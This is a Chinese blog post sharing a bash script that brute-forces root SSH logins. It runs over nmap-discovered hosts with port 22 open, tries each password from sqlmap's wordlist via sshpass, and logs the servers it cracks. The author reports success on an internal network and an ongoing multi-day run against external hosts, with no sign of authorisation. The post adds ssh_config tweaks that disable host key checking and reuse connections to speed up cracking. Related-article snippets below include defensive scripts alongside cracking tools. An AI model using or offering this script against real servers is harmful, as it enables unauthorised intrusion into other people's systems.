暴力破解脚本 shell

最新推荐文章于 2025-07-10 10:32:08 发布
原创 最新推荐文章于 2025-07-10 10:32:08 发布 · 3.8k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种使用Shell脚本进行大规模SSH登录暴力破解的方法。作者利用nmap扫描开放的SSH端口,并借助sqlmap提供的字典文件进行密码猜测。此外,还详细介绍了如何配置ssh客户端以提高破解效率。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

突然间懵生了一个想法 然后就做了(第一次觉得工作这么有趣!!!) 内网已经测试能够成功 外网正在测试,字典比较大估计要跑好几天

先把脚本贴出来:

#!bin/bash
gateway=172.16.80
#nmap -p 22 172.16.81.* |grep open -a3 |grep for|cut -d " " -f5 >hosts
hosts=`cat hosts`
pass=`cat wordlist.txt`
#sshpass -p "yuan" ssh root@172.16.81.73 "ls"
#[ $? == 0 ] && echo "the server is ok "
for i in $hosts; do
	echo "正在准备请稍后"
	for p in $pass; do
		echo "server is $i passwd is $p"
		sshpass -p "$p" ssh root@$i "ls"
		[ $? == 0 ] && echo "这台server $i已经破解 $p" >>server 2>&1
	done
done




hosts 是通过nmap 扫描出来22端口为开启状态的主机

wordlist.txt 是sqlmap自带的暴力破解字典 大概11M左右


ssh_config 添加配置:

StrictHostKeyChecking no
Compression yes
ServerAliveInterval 60
ServerAliveCountMax 5
ControlMaster auto
ControlPath ~/.ssh/sockets/%r@%h-%p
ControlPersist 4h



yuan-ONE
关注
linux脚本解密,shell脚本加密与解密
weixin_42525178的博客
05-04 3121
我们写的shell脚本里面通常会包含帐号密码等信息或者你不想让别人看到的信息,那么把写好的shell脚本进行简单的加密显得有些必要了。常用的shell加密方法有两种,一种是通过gzexe加密,另一种是通过shc加密。我们先给一个简单的脚本,然后用它来进行加密解密演示,脚本abc.sh内容如下#!/bin/bashecho"helloworld!"gzexe加密与解密shell脚本shell&...
OD破解工具脚本大全(附118种脱壳脚本
09-21
Ollydbg 通常称作OD,是反汇编工作的常用工具,该Ollydbg吾爱破解专版是基于Ollydbg V1.10版本汉化而成,吾爱破解OD附带了118脱壳脚本和各种插件,功能非常强大,基本上不需要再附加安装其它插件了。 1.对OD的窗口签名进行了更改,从而避免被针对性检测 2.修改了OD窗口切换快捷键为TAB键、 3.修改附加窗口支持滚轮滚动 4.修改OD启动时为优先加载插件 5.采用论坛夜冷风发布的字符串插件,有效的解决了字符串退出BUG 6.增加了advancedolly插件有效解决了OD无法批量修改及无法进行带壳数据窗口跟随的BUG 7.改动了OD子窗口的类名 8.更新了部分插件及添加部分插件 9.sod默认设置为全选模式,以后会自行更新 10.本次更新后的MD5:fe6ce83710c8834d37d979d818a1c6ba 吾爱破解专用版.rar 11.解决注入代码时提示框 360安全卫士可能会误报StrongOD释放的驱动为病毒,造成ollydbg调试过程中某些功能不能使用。在此提醒大家一下,以免大家误会。如果想调试过程中没有什么障碍,希望大家在调试过程中暂时屏蔽掉360安全卫士。
webshell暴力破解工具 暴力破解
07-30
一款webshell密码暴力破解工具。一款webshell密码暴力破解工具。
Linux防ssh暴力破解shell脚本
qq_28443927的博客
11-19 637
【代码】Linux防ssh暴力破解shell脚本
一个简单的Python暴力破解网站登录密码脚本,从零基础到精通,收藏这篇就够了!
最新发布
Python84310366的博客
07-10 998
这一行的作用是作一次get请求,响应信息被变量Response接收这种方式和burp的Intruder模块的Cluster bomb攻击方式一样Response.status_code是响应的http状态码,len(Response.content)是http响应报文的长度。
shell】压缩包解压密码暴力破解脚本工具源码
软希网分享源码的博客
04-22 1644
shell】压缩包解压密码暴力破解脚本工具源码
linux下shell脚本防ssh暴力破解
韦编二绝
12-30 2653
文章出处:http://coolnull.com/2059.html 说明: 本篇实现shell统计访问失败的IP和次数,从而根据这些再通过防火墙规则来限制这些IP再次暴破,脚本如下: 实现: 1.编写shell脚本 # cat /root/ssh_failed.sh //内容如下 #!/bin/sh SCANIP=`grep "Failed" /var/log/secur
最新SHELL暴力破解
03-28
最新SHELL暴力破解
shell脚本防ssh和vsftpd暴力破解的详解讲解
01-10
脚本需求如下:此SHELL脚本放在crontab计划任务里,每隔6小时(此时间根据实际情况来定义)就去读取/var/log/secure脚本,取出里面恶意猜测IP,如果单位时间内(一星期)的连接数是高于一个阀值,例如100(此阀值也...
基于Python与Shell脚本的SSH暴力破解防护——hosts.deny文件自动配置源码
10-05
该项目是一款利用Python和Shell脚本编写的SSH暴力破解防护工具,包含36个文件,其中Python源码26个,Shell脚本2个,其他类型文件包括文本文件、配置文件和指令文件。该工具通过分析登录日志,自动将尝试通过暴力破解...
shell脚本设置防止暴力破解ssh.docx
07-10
shell脚本设置访问控制,多次失败登录即封掉IP,防止暴力破解ssh 当发现某一台主机向服务器进行SSH远程管理,在10分钟内输错密码3次,使用firewalld进行响应, 禁止此IP再次连接,6个小时候后再次允许连接。
shell 防止暴力破解脚本
06-10
为了防止暴力破解,可以使用 shell 脚本编写一个简单的限制登录尝试次数的脚本。下面是一个简单的实现: ```bash #!/bin/bash limit=3 # 设置最大尝试次数为 3 次 count=0 # 计数器 while [ $count -lt $limit ]; ...
shell 防止暴力破解
weixin_33898876的博客
01-16 106
为防止服务器遭受ssh暴力破解,将尝试ssh暴力破解本机超过10次的IP封掉,禁止其登陆本机!#!/bin/bashcat /var/log/secure |awk '/Failed/{print $(NF-10)}'| sort |uniq -c||awk '{print $2"="$1;}' > /home/test.listfor i in `cat /home/...
SHELL脚本加密与解密
weixin_44218366的博客
01-22 4922
bash unshc.sh 需要解密的sh.x文件 -o 新生成的文件。test.sh.x 二进制可执行文件,用cat查看会是一堆乱码。test.sh.x.c 生成的C源码,可以删除。shc -r -f 需要加密的sh脚本。把下列内容复制到sh文件,直接执行即可。-r 制作可执行的二进制文件。-f 要编译的脚本的文件名。test.sh 原始文件。
利用shell脚本自动拉黑暴力破解登录的IP
请叫我雯子小姐的小爷的博客
11-03 642
脚本 #!/bin/bash DEFINE="10" ips=`lastb | awk '{print $3}' | egrep '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}'` for ip in $ips do NUM=`lastb | grep $ip | wc -l` if [ $NUM -gt $DEFINE ];then grep $ip /etc/hosts.deny &
WING破解脚本
adyf3的博客
01-03 939
#!/usr/bin/env python3 #!复制wingide6的requestCode替换掉 LicenseID='CN123-12345-12345-12345' RequestCode='RW61X-5V3GC-8RVA8-LVXD3' import hashlib B16 = '0123456789ABCDEF' B30 = '123456789ABCDEFGHJKLMN
ctf 逆向 暴力破解类的脚本
cainiao78777的博客
03-15 2063
前言:在分析代码的时候常遇到不好逆向的逻辑,如求余(%)等,下面就是含有求余的两道逆向题目 例题一:buuctf [ACTF新生赛2020]rome 1.查壳 无壳32位exe. 2.ida32打开并分析main函数 发现主要函数 func() int func() { int result; // eax int v1; // [esp+14h] [ebp-44h] int v2; // [esp+18h] [ebp-40h] int v3; // [esp+1Ch] [ebp-3Ch
shell脚本防ssh/vsftpd暴力破解
轻飘飞扬
11-29 2379
#!/bin/bash LIMIT=10 LOGFILE="/var/log/block_ssh.log" TIME=$(date '+%b %e %H') BLOCK_IP=$(grep "$TIME" /var/log/secure|grep Failed|awk '{print $(NF-3)}'|sort|uniq -c|awk '$1>'$LIMIT'{print $1":"$2}')
万能脚本通杀器,能破市面上百分之80的脚本脚本+教程】
gapjun0722的博客
05-09 2386
当前项目是月卡脚本,需要另外购买,介意的或不会玩的小白勿拍!黑马—万能脚本通杀器,懂的都懂,不懂的也不会拍。注意:破解电脑脚本用的,手机的这款用不了!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值